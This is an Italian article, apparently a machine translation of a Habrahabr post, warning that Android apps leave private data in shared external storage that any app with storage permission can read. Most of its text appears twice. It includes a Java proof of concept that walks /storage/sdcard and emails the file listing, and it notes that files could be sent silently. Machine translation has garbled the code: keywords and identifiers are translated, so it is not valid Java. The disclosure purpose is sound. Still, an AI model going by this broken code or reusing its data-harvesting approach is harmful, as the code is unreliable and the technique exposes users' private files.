Android gli sviluppatori di applicazioni non di assistenza agli utenti la sicurezza dei dati, che causa la perdita di dati
da Habrahabr Utente
Si tratta di un segreto che le applicazioni Android sono notoriamente vulnerabile a perdita di dati, principalmente a causa della loro sviluppatori. Ancora un altro fatto che conferma che è stato recentemente descritto in habrahabr.ru russa la risorsa, popolare con gli esperti, in particolare con gli sviluppatori di app.
Sul proprio smartphone, l'autore del post notato le directory e i file da applicazioni, che era stata eliminata, in /storage/sdcard, e mi chiedevo se una app Android era in grado di leggere i file temporanei di un'altra app.
I file temporanei e perché dovremmo cura? Questi file possono contenere foto, telefono di record di database di diari e un sacco di altre informazioni che personalmente ritengono privato e non volete renderlo disponibile a tutti.
In Android, file temporanei di tutte le applicazioni sono memorizzati in /storage/sdcard. Quando un'app viene eliminato, questi temps rimangono - se lo sviluppatore non ha cura per la loro eliminazione, in questo caso.
Un gestore di file scaricati da google.gioco vi permetterà di leggere i file temporanei di tutte le applicazioni installate sul dispositivo Android, tra cui in chiaro le registrazioni di conversazioni telefoniche da messaggeri e telefonia sip apps, cronologia di navigazione da browser, playlist da giocatori, varie informazioni dai social network, note personali su cose da fare, da diari, et cetera.
Solo fantasia: i file temporanei da whatsapp, popolare messenger con oltre 33 000 000 utenti, sono anche memorizzati in /storage/sdcard; che cosa è più, solo i messaggi sono criptati, le foto non sono. Whatsapp è solo un esempio di molti, quasi tutti i più popolari applicazioni di memorizzare i vostri dati personali in /storage/sdcard/%appName% e qualsiasi altra applicazione ha accesso a questa directory.
Per esempio, questo programma memorizza le foto inviata nella directory accessibile a tutte le applicazioni sul vostro dispositivo, che dispone dell'autorizzazione per accedere allo storage:
E questo popolare client sip memorizza impostazioni del vostro account sip. Nel peggiore dei casi, questi dati possono essere rubati per ottenere l'accesso non autorizzato:
Bene, significa che qualcuno può rubare le foto dal tuo dispositivo Android? L'autore ha scritto un grazioso piccolo programma in Java che ha inviato alla struttura di /storage/sdcard all'indirizzo e-mail specificato.
Il codice sorgente dell'applicazione e-mail la struttura delle directory in /storage/sdcard:
-----------------
-----------------
Inserisci l'indirizzo e-mail e l'app e-mail la struttura delle directory in /storage/sdcard; come sapete, questo può essere fatto senza la richiesta di e-mail e non solo la struttura delle directory, ma anche gli stessi file possono essere inviati. Le app di google.giocare è improbabile che possano essere controllati molto attentamente. Purtroppo, questo è uno strumento molto efficace per il marketing, perché vogliono sempre sapere quanto più possibile su di loro utenti. Inutile dire che i dati personali possono essere ottenuti in questo modo.
E qui è la lettera che riceverai; esso contiene il contenuto di /storage/sdcard, cioè ci saranno tutti i file e cartelle di applicazioni installate sul vostro dispositivo:
Vista la tua cartella /storage/sdcard tramite un qualsiasi file manager per android; come opzione è disponibile quando si collega il dispositivo a un PC /telefono; se si utilizza messaggeri, i social network, un task scheduler, vedere quello che, teoricamente, qualsiasi android sviluppatore, che ha scritto android.il permesso.READ_EXTERNAL_STORAGE nel manifesto.
Quindi, la conclusione è chiara: un sacco di coloro che sviluppano applicazioni come i social network, instant messenger, telefonia sip client, diari, non cura circa la sicurezza dei dati degli utenti.
Data di pubblicazione:
Sul proprio smartphone, l'autore del post notato le directory e i file da applicazioni, che era stata eliminata, in /storage/sdcard, e mi chiedevo se una app Android era in grado di leggere i file temporanei di un'altra app.
I file temporanei e perché dovremmo cura? Questi file possono contenere foto, telefono di record di database di diari e un sacco di altre informazioni che personalmente ritengono privato e non volete renderlo disponibile a tutti.
In Android, file temporanei di tutte le applicazioni sono memorizzati in /storage/sdcard. Quando un'app viene eliminato, questi temps rimangono - se lo sviluppatore non ha cura per la loro eliminazione, in questo caso.
Un gestore di file scaricati da google.gioco vi permetterà di leggere i file temporanei di tutte le applicazioni installate sul dispositivo Android, tra cui in chiaro le registrazioni di conversazioni telefoniche da messaggeri e telefonia sip apps, cronologia di navigazione da browser, playlist da giocatori, varie informazioni dai social network, note personali su cose da fare, da diari, et cetera.
Solo fantasia: i file temporanei da whatsapp, popolare messenger con oltre 33 000 000 utenti, sono anche memorizzati in /storage/sdcard; che cosa è più, solo i messaggi sono criptati, le foto non sono. Whatsapp è solo un esempio di molti, quasi tutti i più popolari applicazioni di memorizzare i vostri dati personali in /storage/sdcard/%appName% e qualsiasi altra applicazione ha accesso a questa directory.
Per esempio, questo programma memorizza le foto inviata nella directory accessibile a tutte le applicazioni sul vostro dispositivo, che dispone dell'autorizzazione per accedere allo storage:
E questo popolare client sip memorizza impostazioni del vostro account sip. Nel peggiore dei casi, questi dati possono essere rubati per ottenere l'accesso non autorizzato:
Bene, significa che qualcuno può rubare le foto dal tuo dispositivo Android? L'autore ha scritto un grazioso piccolo programma in Java che ha inviato alla struttura di /storage/sdcard all'indirizzo e-mail specificato.
Il codice sorgente dell'applicazione e-mail la struttura delle directory in /storage/sdcard:
-----------------
pacchetto android.com.testapp;
import android.contenuto.Intento;
import android.os.Ambiente;
import android.il supporto.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.vista.Vista;
import android.widget.Pulsante;
import android.widget.EditText;
import android.widget.Brindisi;
import java.io.File;
import java.util.Data;
public class obbiettivo principale l'allevamento si estende AppCompatActivity {
Pulsante emailButton;
EditText e-mail;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
la chiamata a setcontentview(R. layout.activity_main);
e-mail = (EditText) findViewById(R. id.la posta elettronica);
emailButton = (Button) findViewById(R. id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}
protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.a piedi(new File(Ambiente.getExternalStorageDirectory().getAbsolutePath()));
}
classe privata Filewalker {
private int count = 0;
private String sked = "";
public void piedi(File root) {
count++;
File[] list = root.listFiles();
per (File f : elenco) {
if (f.isDirectory()) {
sked += "il tempo:" + new Date(f.lastModified()) + ", dir: "+ f.getAbsoluteFile() + "\n";
a piedi(f);
}
else {
sked += "il tempo:" + new Date(f.lastModified()) + ", size: "+ f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}
protected void sendMail(String sked) {
Intent i = new Intent(Intent.ACTION_SEND);
io.setType("message/rfc822");
io.putExtra(Intent.EXTRA_EMAIL, new String[]{e-mail.getText().toString()});
io.putExtra(Intent.EXTRA_SUBJECT, "android struttura di stoccaggio");
io.putExtra(Intent.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Invia e-mail..."));
} catch (android.contenuto.ActivityNotFoundException ex) {
Brindisi.makeText(getApplicationContext(), "non C'è nessun client di posta installato.", Brindisi.LENGTH_SHORT).show();
}
}
}
-----------------
Inserisci l'indirizzo e-mail e l'app e-mail la struttura delle directory in /storage/sdcard; come sapete, questo può essere fatto senza la richiesta di e-mail e non solo la struttura delle directory, ma anche gli stessi file possono essere inviati. Le app di google.giocare è improbabile che possano essere controllati molto attentamente. Purtroppo, questo è uno strumento molto efficace per il marketing, perché vogliono sempre sapere quanto più possibile su di loro utenti. Inutile dire che i dati personali possono essere ottenuti in questo modo.
E qui è la lettera che riceverai; esso contiene il contenuto di /storage/sdcard, cioè ci saranno tutti i file e cartelle di applicazioni installate sul vostro dispositivo:
Vista la tua cartella /storage/sdcard tramite un qualsiasi file manager per android; come opzione è disponibile quando si collega il dispositivo a un PC /telefono; se si utilizza messaggeri, i social network, un task scheduler, vedere quello che, teoricamente, qualsiasi android sviluppatore, che ha scritto android.il permesso.READ_EXTERNAL_STORAGE nel manifesto.
Quindi, la conclusione è chiara: un sacco di coloro che sviluppano applicazioni come i social network, instant messenger, telefonia sip client, diari, non cura circa la sicurezza dei dati degli utenti.
Data di pubblicazione:
